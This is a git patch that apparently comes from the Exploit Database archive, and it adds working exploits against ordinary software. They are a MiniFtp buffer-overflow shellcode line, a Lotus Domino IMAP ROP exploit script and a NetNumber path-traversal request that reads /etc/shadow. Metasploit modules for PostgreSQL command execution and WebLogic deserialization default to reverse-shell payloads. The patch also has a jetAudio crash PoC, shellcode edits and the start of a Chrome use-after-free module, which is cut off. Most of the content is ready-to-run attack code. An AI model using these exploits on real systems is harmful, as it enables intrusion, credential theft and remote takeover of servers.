From 5a4d21a1cfd5fe39c5be7890472de44e7d2436e9 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 9 May 2019 05:02:02 +0000
Subject: [PATCH] DB: 2019-05-09

9 changes to exploits/shellcodes

jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)

MiniFtp - 'parseconf_load_setting' Buffer Overflow
Lotus Domino 8.5.3 - 'EXAMINE' Stack Buffer Overflow DEP/ASLR Bypass (NSA's EMPHASISMINE)
Google Chrome 72.0.3626.119 - 'FileReader' Use-After-Free (Metasploit)
PostgreSQL 9.3 - COPY FROM PROGRAM Command Execution (Metasploit)
Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)

NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass

Linux/x86 - execve /bin/sh Shellcode (20 bytes)
---
 exploits/linux/local/46807.txt       |  82 +++++
 exploits/linux/webapps/46811.txt     |  36 +++
 exploits/multiple/remote/46813.rb    | 250 ++++++++++++++++
 exploits/multiple/remote/46814.rb    | 172 +++++++++++
 exploits/windows/dos/46810.py        |  21 ++
 exploits/windows/local/46805.py      |  18 +-
 exploits/windows/remote/46808.py     |  67 +++++
 exploits/windows_x86/remote/46812.rb | 432 +++++++++++++++++++++++++++
 files_exploits.csv                   |   7 +
 files_shellcodes.csv                 |   1 +
 shellcodes/linux_x86/46809.c         |  31 ++
 11 files changed, 1108 insertions(+), 9 deletions(-)
 create mode 100644 exploits/linux/local/46807.txt
 create mode 100644 exploits/linux/webapps/46811.txt
 create mode 100755 exploits/multiple/remote/46813.rb
 create mode 100755 exploits/multiple/remote/46814.rb
 create mode 100755 exploits/windows/dos/46810.py
 create mode 100755 exploits/windows/remote/46808.py
 create mode 100755 exploits/windows_x86/remote/46812.rb
 create mode 100644 shellcodes/linux_x86/46809.c

diff --git a/exploits/linux/local/46807.txt b/exploits/linux/local/46807.txt
new file mode 100644
index 000000000..79d6b4f85
--- /dev/null
+++ b/exploits/linux/local/46807.txt
@@ -0,0 +1,82 @@
+# Exploit Title: MiniFtp parseconf_load_setting local-bufferoverflow (318 bytes)
+# Google Dork: None
+# Date: 11.04.2019
+# Exploit Author: strider
+# Vendor Homepage: https://github.com/skyqinsc/MiniFtp
+# Software Link: https://github.com/skyqinsc/MiniFtp
+# Tested on: Debian 9 Stretch i386/ Kali Linux i386
+# CVE : None
+# Shellcode Length: 318
+------------------------------[Description]---------------------------------
+
+This exploit spawns a shell with root privileges. The exploit will be written into the file miniftpd.conf
+
+vuln code:
+void parseconf_load_setting(const char *setting){
+while(isspace(*setting)) setting++;
+	char key[128] = {0}, value[128] = {0};
+	str_split(setting, key, value, '=');
+	if(strlen(value) == 0){
+		fprintf(stderr, "missing value in config file for : %s\n", key);
+		exit(EXIT_FAILURE);
+	}
+....
+
+The given var settings is a *char and will be splitted into key and value key and value are both 128 char long and settings can be longer than 128 + 128 chars. this issue will not be checked and stored. This causes a buffer overflow.
+
+after return it 
+
+-----------------------------[Gdb-Peda Dump]---------------------------------
+[----------------------------------registers-----------------------------------]
+RAX: 0x0 
+RBX: 0x48575250e7894851 
+RCX: 0xffffffd480050f3b 
+RDX: 0x90 
+RSI: 0x7fffffffd3a0 --> 0x9090909090909090 
+RDI: 0x55555555c854 ("download_max_rate")
+RBP: 0x50f3bc08348e689 
+RSP: 0x7fffffffd460 --> 0x555555556860 (<_start>:	xor    ebp,ebp)
+RIP: 0x7fffffffd481 --> 0x9090909090909090 
+R8 : 0xa ('\n')
+R9 : 0x7fffffffd4a0 --> 0x9090909090909090 
+R10: 0x83a 
+R11: 0x7ffff7891520 (<__strcmp_sse2_unaligned>:	mov    eax,edi)
+R12: 0x555555556860 (<_start>:	xor    ebp,ebp)
+R13: 0x7fffffffe200 --> 0x1 
+R14: 0x0 
+R15: 0x0
+EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+   0x7fffffffd478:	imul   esi,DWORD PTR [rax+0x3d],0x90909090
+   0x7fffffffd47f:	nop
+   0x7fffffffd480:	nop
+=> 0x7fffffffd481:	nop
+   0x7fffffffd482:	nop
+   0x7fffffffd483:	nop
+   0x7fffffffd484:	nop
+   0x7fffffffd485:	nop
+[------------------------------------stack-------------------------------------]
+0000| 0x7fffffffd460 --> 0x555555556860 (<_start>:	xor    ebp,ebp)
+0008| 0x7fffffffd468 --> 0x55555555b5b2 ("miniftpd.conf")
+0016| 0x7fffffffd470 ("max_per_ip=", '\220' <repeats 189 times>...)
+0024| 0x7fffffffd478 --> 0x90909090903d7069 
+0032| 0x7fffffffd480 --> 0x9090909090909090 
+0040| 0x7fffffffd488 --> 0x9090909090909090 
+0048| 0x7fffffffd490 --> 0x9090909090909090 
+0056| 0x7fffffffd498 --> 0x9090909090909090 
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+0x00007fffffffd481 in ?? ()
+gdb-peda$ 
+
+
+ -----------------------------[Exploit]---------------------------------------------
+
+python -c "print 'max_per_ip=' + '\x90' * 278 + '\x48\x31\xc0\x48\x31\xd2\x50\x49\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x41\x51\x48\x89\xe7\x50\x52\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05' + '\x80\xd4\xff\xff\xff\x7f'" > miniftpd.conf
+
+
+ -----------------------------[how to run]-----------------------------
+
+run the line above in a shell
+
+run MiniFtp in gdb and you got a shell
\ No newline at end of file
diff --git a/exploits/linux/webapps/46811.txt b/exploits/linux/webapps/46811.txt
new file mode 100644
index 000000000..a47ce543d
--- /dev/null
+++ b/exploits/linux/webapps/46811.txt
@@ -0,0 +1,36 @@
+# Exploit Title: NetNumber Titan ENUM/DNS/NP - Path Traversal - Authorization Bypass
+# Google Dork: N/A
+# Date: 4/29/2019
+# Exploit Author: MobileNetworkSecurity
+# Vendor Homepage: https://www.netnumber.com/products/#data
+# Software Link: N/A
+# Version: Titan Master 7.9.1
+# Tested on: Linux
+# CVE : N/A
+# Type: WEBAPP
+
+*************************************************************************
+A Path Traversal issue was discovered in the Web GUI of NetNumber Titan 7.9.1.
+When an authenticated user attempts to download a trace file (through drp) by using a ../../ technique, arbitrary files can be downloaded from the server. Since the webserver running with elevated privileges it is possible to download arbitrary files.
+The HTTP request can be executed by any (even low privileged) user, so the authorization mechanism can be bypassed.
+*************************************************************************
+
+Proof of Concept (PoC):
+
+http://X.X.X.X/drp?download=true&path=Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
+
+The vulnerable path parameter is base64 encoded where the equal sign replaced by the dollar sign.
+
+Original payload:
+Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw$$
+
+Replaced dollar signs:
+Ly9TWVNURU0vc3lzdGVtL3RyYWNlP2Rvd25sb2FkPXQmZWw9Li4vLi4vLi4vLi4vZXRjL3NoYWRvdw==
+
+Base64 decoded payload:
+//SYSTEM/system/trace?download=t&el=../../../../etc/shadow
+
+In the HTTP response you will receive the content of the file.
+
+*************************************************************************
+The issue has been fixed in the newer version of the software.
\ No newline at end of file
diff --git a/exploits/multiple/remote/46813.rb b/exploits/multiple/remote/46813.rb
new file mode 100755
index 000000000..23f9342f8
--- /dev/null
+++ b/exploits/multiple/remote/46813.rb
@@ -0,0 +1,250 @@
+\##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/postgres'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PostgreSQL COPY FROM PROGRAM Command Execution',
+      'Description' => %q(
+        Installations running Postgres 9.3 and above have functionality which allows for the superuser
+        and users with 'pg_execute_server_program' to pipe to and from an external program using COPY.
+        This allows arbitrary command execution as though you have console access.
+
+        This module attempts to create a new table, then execute system commands in the context of
+        copying the command output into the table.
+
+        This module should work on all Postgres systems running version 9.3 and above.
+
+        For Linux & OSX systems, target 1 is used with cmd payloads such as: cmd/unix/reverse_perl
+
+        For Windows Systems, target 2 is used with powershell payloads such as: cmd/windows/powershell_reverse_tcp
+        Alternativly target 3 can be used to execute generic commands, such as a web_delivery meterpreter powershell payload
+        or other customised command.
+      ),
+      'Author' => [
+        'Jacob Wilkin' # Exploit Author of Module
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        ['CVE', '2019-9193'],
+        ['URL', 'https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5'],
+        ['URL', 'https://www.postgresql.org/docs/9.3/release-9-3.html'] #Patch notes adding the function, see 'E.26.3.3. Queries - Add support for piping COPY and psql \copy data to/from an external program (Etsuro Fujita)'
+      ],
+      'PayloadType' => 'cmd',
+      'Platform' => %w(linux unix win osx),
+      'Payload' => {
+      },
+      'Arch' => [ARCH_CMD],
+      'Targets'        =>
+        [
+          [
+            'Unix/OSX/Linux', {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'Payload' => 'cmd/unix/reverse_perl' }
+              }
+          ],[
+            'Windows - PowerShell (In-Memory)', {
+              'Platform' => 'windows',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => {
+                'Payload' => 'cmd/windows/powershell_reverse_tcp' }
+              }
+          ],[
+            'Windows (CMD)',
+            'Platform'   => 'win',
+            'Arch'       => [ARCH_CMD],
+            'Payload' => {
+              'Compat'     => {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'adduser, generic'
+              }
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Mar 20 2019'
+    ))
+
+    register_options([
+      Opt::RPORT(5432),
+      OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
+      OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
+      ])
+
+    deregister_options('SQL', 'RETURN_ROWSET', 'VERBOSE')
+  end
+
+  # Return the datastore value of the same name
+  # @return [String] tablename for table to use with command execution
+  def tablename
+    datastore['TABLENAME']
+  end
+
+  def check
+    vuln_version? ? CheckCode::Appears : CheckCode::Safe
+  end
+
+  def vuln_version?
+    version = postgres_fingerprint
+    return false unless version[:auth]
+    vprint_status version[:auth].to_s
+    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
+    if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
+      return true
+    else
+      return false
+    end
+  end
+
+  def login_success?
+    status = do_login(username, password, database)
+    case status
+    when :noauth
+      print_error "#{peer} - Authentication failed"
+      return false
+    when :noconn
+      print_error "#{peer} - Connection failed"
+      return false
+    else
+      print_status "#{peer} - #{status}"
+      return true
+    end
+  end
+
+  def execute_payload
+    # Drop table if it exists
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Create Table
+    query = "CREATE TABLE #{tablename}(filename text);"
+    create_query = postgres_query(query)
+    case create_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} created successfully"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    # Copy Command into Table
+    cmd_filtered = payload.encoded.gsub("'", "''")
+    query = "COPY #{tablename} FROM PROGRAM '#{cmd_filtered}';"
+    copy_query = postgres_query(query)
+    case copy_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
+        print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
+        return false
+      end
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} copied successfully(valid syntax/command)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+
+    if datastore['DUMP_TABLE_OUTPUT']
+    # Select output from table for debugging
+      query = "SELECT * FROM #{tablename};"
+      select_query = postgres_query(query)
+      case select_query.keys[0]
+      when :conn_error
+        print_error "#{peer} - Connection error"
+        return false
+      when :sql_error
+        print_warning "#{peer} - Unable to execute query: #{query}"
+        return false
+      when :complete
+        print_good "#{peer} - #{tablename} contents:\n#{select_query}"
+        return true
+      else
+        print_error "#{peer} - Unknown"
+        return false
+      end
+    end
+    # Clean up table evidence
+    query = "DROP TABLE IF EXISTS #{tablename};"
+    drop_query = postgres_query(query)
+    case drop_query.keys[0]
+    when :conn_error
+      print_error "#{peer} - Connection error"
+      return false
+    when :sql_error
+      print_warning "#{peer} - Unable to execute query: #{query}"
+      return false
+    when :complete
+      print_good "#{peer} - #{tablename} dropped successfully(Cleaned)"
+    else
+      print_error "#{peer} - Unknown"
+      return false
+    end
+  end
+
+  def do_login(user, pass, database)
+    begin
+      password = pass || postgres_password
+      result = postgres_fingerprint(
+        db: database,
+        username: user,
+        password: password
+      )
+
+      return result[:auth] if result[:auth]
+      print_error "#{peer} - Login failed"
+      return :noauth
+
+    rescue Rex::ConnectionError
+      return :noconn
+    end
+  end
+
+  def exploit
+    #vuln_version doesn't seem to work
+    #return unless vuln_version?
+    return unless login_success?
+    print_status("Exploiting...")
+    if execute_payload
+      print_status("Exploit Succeeded")
+    else
+      print_error("Exploit Failed")
+    end
+    postgres_logout if @postgres_conn
+  end
+end
\ No newline at end of file
diff --git a/exploits/multiple/remote/46814.rb b/exploits/multiple/remote/46814.rb
new file mode 100755
index 000000000..2fed80d01
--- /dev/null
+++ b/exploits/multiple/remote/46814.rb
@@ -0,0 +1,172 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',
+      'Description' => %q{
+        An unauthenticated attacker with network access to the Oracle Weblogic Server T3
+        interface can send a malicious SOAP request to the interface WLS AsyncResponseService
+        to execute code on the vulnerable host.
+      },
+      'Author' =>
+        [
+        'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>',  # Metasploit Module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2019-2725'],
+          ['CNVD-C', '2019-48814'],
+          ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],
+          ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html']
+        ],
+      'Privileged' => false,
+      'Platform' => %w{ unix win solaris },
+      'Targets' =>
+        [
+          [ 'Unix',
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_bash'}
+          ],
+          [ 'Windows',
+            'Platform' => 'win',
+            'Arch' => [ARCH_X64, ARCH_X86],
+            'DefaultOptions' => {'PAYLOAD' => 'windows/meterpreter/reverse_tcp'}
+          ],
+          [ 'Solaris',
+            'Platform' => 'solaris',
+            'Arch' => ARCH_CMD,
+            'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'},
+            'Payload' => {
+              'Space'       => 2048,
+              'DisableNops' => true,
+              'Compat'      =>
+                {
+                  'PayloadType' => 'cmd',
+                  'RequiredCmd' => 'generic perl telnet',
+                }
+            }
+          ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 12
+        },
+      'DisclosureDate' => 'Apr 23 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(7001),
+        OptString.new('URIPATH', [false, 'URL to the weblogic instance (leave blank to substitute RHOSTS)', nil]),
+        OptString.new('WSPATH', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'      => normalize_uri(datastore['WSPATH']),
+      'method'   => 'POST',
+      'ctype'    => 'text/xml',
+      'headers'  => {'SOAPAction' => '' }
+    )
+
+    if res && res.code == 500 && res.body.include?("<faultcode>env:Client</faultcode>")
+      vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")
+      vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")
+      Exploit::CheckCode::Vulnerable
+    elsif res && res.code != 202
+      vprint_status("The target returned a non-vulnerable HTTP code")
+      Exploit::CheckCode::Safe
+    elsif res.nil?
+      vprint_status("The target did not respond in an expected way")
+      Exploit::CheckCode::Unknown
+    else
+      vprint_status("The target returned HTTP code: #{res.code}")
+      vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    print_status("Generating payload...")
+    case target.name
+    when 'Windows'
+      string0_cmd = 'cmd.exe'
+      string1_param = '/c'
+      shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {remove_comspec: true, encoded: false })
+    when 'Unix','Solaris'
+      string0_cmd = '/bin/bash'
+      string1_param = '-c'
+      shell_payload = payload.encoded
+    end
+
+    random_action = rand_text_alphanumeric(20)
+    random_relates = rand_text_alphanumeric(20)
+
+    soap_payload =  %Q|<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"|
+    soap_payload <<   %Q|xmlns:wsa="http://www.w3.org/2005/08/addressing"|
+    soap_payload <<   %Q|xmlns:asy="http://www.bea.com/async/AsyncResponseService">|
+    soap_payload <<   %Q|<soapenv:Header>|
+    soap_payload <<     %Q|<wsa:Action>#{random_action}</wsa:Action>|
+    soap_payload <<     %Q|<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>|
+    soap_payload <<     %Q|<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">|
+    soap_payload <<       %Q|<void class="java.lang.ProcessBuilder">|
+    soap_payload <<         %Q|<array class="java.lang.String" length="3">|
+    soap_payload <<           %Q|<void index="0">|
+    soap_payload <<             %Q|<string>#{string0_cmd}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<           %Q|<void index="1">|
+    soap_payload <<             %Q|<string>#{string1_param}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<           %Q|<void index="2">|
+    soap_payload <<             %Q|<string>#{shell_payload.encode(xml: :text)}</string>|
+   #soap_payload <<             %Q|<string>#{xml_encode(shell_payload)}</string>|
+    soap_payload <<           %Q|</void>|
+    soap_payload <<         %Q|</array>|
+    soap_payload <<       %Q|<void method="start"/>|
+    soap_payload <<       %Q|</void>|
+    soap_payload <<     %Q|</work:WorkContext>|
+    soap_payload <<   %Q|</soapenv:Header>|
+    soap_payload <<   %Q|<soapenv:Body>|
+    soap_payload <<     %Q|<asy:onAsyncDelivery/>|
+    soap_payload <<   %Q|</soapenv:Body>|
+    soap_payload << %Q|</soapenv:Envelope>|
+
+    uri = normalize_uri(datastore['WSPATH'])
+    if uri.nil?
+      datastore['URIPATH'] = "http://#{RHOST}:#{RPORT}/"
+    end
+
+    print_status("Sending payload...")
+
+    begin
+      res = send_request_cgi(
+        'uri'      => uri,
+        'method'   => 'POST',
+        'ctype'    => 'text/xml',
+        'data'     => soap_payload,
+        'headers'  => {'SOAPAction' => '' }
+      )
+    rescue Errno::ENOTCONN
+      fail_with(Failure::Disconnected, "The target forcibly closed the connection, and is likely not vulnerable.")
+    end
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "No response from host")
+    elsif res && res.code != 202
+      fail_with(Failure::UnexpectedReply,"Exploit failed.  Host did not responded with HTTP code #{res.code} instead of HTTP code 202")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/windows/dos/46810.py b/exploits/windows/dos/46810.py
new file mode 100755
index 000000000..0b54ebdfd
--- /dev/null
+++ b/exploits/windows/dos/46810.py
@@ -0,0 +1,21 @@
+#Exploit Title:  jetAudio 8.1.7.20702 Basic - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-07
+#Vendor Homepage: http://www.jetaudio.com/
+#Software Link: http://www.jetaudio.com/download/
+#Tested Version: 8.1.7.20702
+#Tested on: Windows 7 Service Pack 1 x64 / Windows 10 Single Language x64
+
+#Steps to produce the crash:
+#1.- Run python code: jetAudio_8.1.7.20702.py
+#2.- Open jetAudio.txt and copy content to clipboard
+#2.- Open jetAudio 
+#3.- Select Menu > Basic Controls > Open URL...
+#4.- In "Enter URL" Paste ClipBoard after "http://" 
+#5.- Click on "Ok"
+#6.- Crashed
+
+cod = "\x41" * 5000
+f = open('jetAudio.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/46805.py b/exploits/windows/local/46805.py
index d5823d20d..f66960153 100755
--- a/exploits/windows/local/46805.py
+++ b/exploits/windows/local/46805.py
@@ -16,14 +16,18 @@
 
 
 # This got a bit hairy. We manually encoded our shellcode, and we had to use the sub method for each encode.
-# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E and this was an odd character set.
+# 05 was a bad char for us, which was an add eax opcode. We could use (in hex) 1-4,6,10-7E. This was an odd character set.
 
 # calc.exe shellcode:
 # "\x31\xc9\x51\x68"
 # "\x63\x61\x6c\x63"
 # "\x54\xB8\xc7\x93"
 # "\xc2\x77\xff\xd0"
+
 # Can replace with a shell, if you are willing to do the encoding and decoding math :-) Too preoccupied for now, so here is a calc.exe
+# You would need to use logicla AND and the SUB EAX opcodes to get a value on the stack that could jump back to the A buffer, where there is
+# much more room. Then you would need to align the stack with the value you need (not 0x012F3F4 as used below), and write upwards on the stack.
+# You should have enough room for all of the logical AND and SUB EAX commands to get a full shell on the stack.
 
 # For zeroing out registers before manual shellcode
 zero = "\x25\x01\x01\x01\x01"           # and eax, 0x01010101
@@ -37,12 +41,12 @@ restore += "\x51"		# push ecx; (to get the value on the stack for the mov esp co
 
 # Stack alignment
 # Need to make ESP 0x012F3F4. Using sub method to write that value onto the stack.
-# AFter making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
+# After making ESP 0x012F3F4, it should be the same value as EAX- so we can write up the stack.
 alignment = "\x54"			# push esp
 alignment += "\x58"			# pop eax; (puts the value of ESP into EAX)
 
 # Write these 3 sub values in normal format, since memory address, not instruction to be executed.
-# 364D5555 364D5555 364E5555
+# 384D5555 364D5555 364E5555
 alignment += "\x2d\x38\x4d\x55\x55"	# sub eax, 0x384D5555
 alignment += "\x2d\x36\x4d\x55\x55"	# sub eax, 0x364D5555
 alignment += "\x2d\x36\x4e\x55\x55"	# sub eax, 0x364E5555
@@ -50,7 +54,7 @@ alignment += "\x50"			# push eax
 alignment += "\x5c"			# pop esp; (puts the value of eax back into esp)
 
 # calc.exe shellcode, via the sub method. Values needed are as followed. Reference the calc.exe shellcode line for line numbers.
-# 1st line = 2C552D14 01562D14 01562E16
+# 1st line = 2C552D14 01552D14 01562E16
 shellcode = zero
 shellcode += "\x2d\x14\x2d\x55\x2c"	# sub eax, 0x2C552D14
 shellcode += "\x2d\x14\x2d\x55\x01"	# sub eax, 0x01562D14
@@ -80,9 +84,7 @@ shellcode += "\x50"			# push eax
 
 # We need to restore the old ESP value of 0x0012DC98 to spawn calc.exe. Since it is a syscall,
 # We need the ESP value before execution. We will do this by performing MOV ECX, ESP (remember ECX contains old ESP!)
-# Here are the 3 values: 3F3F2711 3F3F2711 3F3F2811
-# For some reason the application changed some of my math. 3F3F2811 was supposed to be
-# 403F3F2811 and so I changed it by 1 hex byte to get the CC (was getting CD)
+# Here are the 3 values: 403F2711 3F3F2711 3F3F2811
 move = zero
 move += "\x2d\x40\x3f\x27\x11"		# sub eax, 0x3F3F2711
 move += "\x2d\x3f\x3f\x27\x11"		# sub eax, 0x3F3F2711
@@ -109,8 +111,6 @@ payload += shellcode
 payload += move
 payload += "\x43" * (5000-len(payload))
 
-print payload
-
 f = open('pwn.txt', 'w')
 f.write(payload)
 f.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/46808.py b/exploits/windows/remote/46808.py
new file mode 100755
index 000000000..9b838459c
--- /dev/null
+++ b/exploits/windows/remote/46808.py
@@ -0,0 +1,67 @@
+##########################################################
+#							  #
+# Here is a working version of the NSA's EMPHASISMINE     #
+# for IMAP Server Lotus Domino 8.5.3 FP0		  #
+#        DEP/ASLR bypass				  #
+#							  #
+# Replace breakpoints with msfvenom payload   		  #
+#	(ALPHANUMERIC)					  #
+# I love you Alison Thompson OAM @ThirdWaveORG            #
+# Author: Charles Truscott @r0ss1n1			  #
+#							  #
+###########################################################
+
+
+import base64
+import struct
+import socket
+import time
+
+rop_and_roll = struct.pack('<I', 0x00433212)  # POP ECX # RETN [nIMAP.EXE]
+rop_and_roll += struct.pack('<I', 0x41414141)  # Filler
+rop_and_roll += struct.pack('<I', 0x7c37a140)  # ptr to &VirtualProtect() [IAT MSVCR71.dll]
+rop_and_roll += struct.pack('<I', 0x60609925)  # MOV EAX,DWORD PTR DS:[ECX] # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x60b79a61)  # XCHG EAX,ESI # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x62450fc4)  # POP EBP # RETN [NLSCCSTR.DLL]
+rop_and_roll += struct.pack('<I', 0x7c345c30)  # & push esp # ret  [MSVCR71.dll]
+rop_and_roll += struct.pack('<I', 0x60165ba9)  # POP EBX # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x00000001)  # 0x00000001-> ebx
+rop_and_roll += struct.pack('<I', 0x6020962e)  # POP EDX # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x00001000)  # 0x00001000-> edx
+rop_and_roll += struct.pack('<I', 0x60e81a98)  # POP ECX # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x00000040)  # 0x00000040-> ecx
+rop_and_roll += struct.pack('<I', 0x606609f9)  # POP EDI # RETN [nnotes.dll]
+rop_and_roll += struct.pack('<I', 0x62136802)  # RETN (ROP NOP) [nxmlproc.dll]
+rop_and_roll += struct.pack('<I', 0x0042ba51)  # POP EAX # RETN [nIMAP.EXE]
+rop_and_roll += struct.pack('<I', 0x90909090)  # nop
+rop_and_roll += struct.pack('<I', 0x60505637)  # PUSHAD # RETN [nnotes.dll]
+
+
+username = "user"
+
+password = "pass"
+
+login=". LOGIN " + " " +  '"' + username + '"' +  " " + '"' +  password + '"' +  "\r\n"
+
+
+payload = "\x90" * 556 + rop_and_roll + "\x90" * 20 + "\xCC" * (1500 - 556 - len(rop_and_roll) - 20)
+encoded = base64.b64encode(payload)
+
+crash = ". EXAMINE " + "&" + encoded + "\x0d\x0a"
+
+print crash
+expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+expl.connect(('172.16.65.128', 143))
+time.sleep(3)
+connectionresponse = expl.recv(1024)
+print str(connectionresponse)
+print "sending LOGIN request"
+expl.send(login)
+loginresponse = expl.recv(1024)
+print str(loginresponse)
+print "sending EXAMINE request"
+print crash
+expl.send(crash)
+crashresponse = expl.recv(1024)
+print str(crashresponse)
+expl.close
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/46812.rb b/exploits/windows_x86/remote/46812.rb
new file mode 100755
index 000000000..e4108504e
--- /dev/null
+++ b/exploits/windows_x86/remote/46812.rb
@@ -0,0 +1,432 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86',
+      'Description'    => %q{
+        This exploit takes advantage of a use after free vulnerability in Google
+      Chrome 72.0.3626.119 running on Windows 7 x86.
+        The FileReader.readAsArrayBuffer function can return multiple references to the
+      same ArrayBuffer object, which can be freed and overwritten with sprayed objects.
+      The dangling ArrayBuffer reference can be used to access the sprayed objects,
+      allowing arbitrary memory access from Javascript. This is used to write and
+      execute shellcode in a WebAssembly object.
+        The shellcode is executed within the Chrome sandbox, so you must explicitly
+      disable the sandbox for the payload to be successful.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Clement Lecigne', # discovery
+          'István Kurucsai', # Exodus Intel
+          'timwr',           # metasploit module
+        ],
+      'References'     => [
+          ['CVE', '2019-5786'],
+          ['URL', 'https://github.com/exodusintel/CVE-2019-5786'],
+          ['URL', 'https://blog.exodusintel.com/2019/03/20/cve-2019-5786-analysis-and-exploitation/'],
+          ['URL', 'https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/analysis-of-a-chrome-zero-day-cve-2019-5786/'],
+          ['URL', 'https://security.googleblog.com/2019/03/disclosing-vulnerabilities-to-protect.html'],
+        ],
+      'Arch'           => [ ARCH_X86 ],
+      'Platform'       => 'windows',
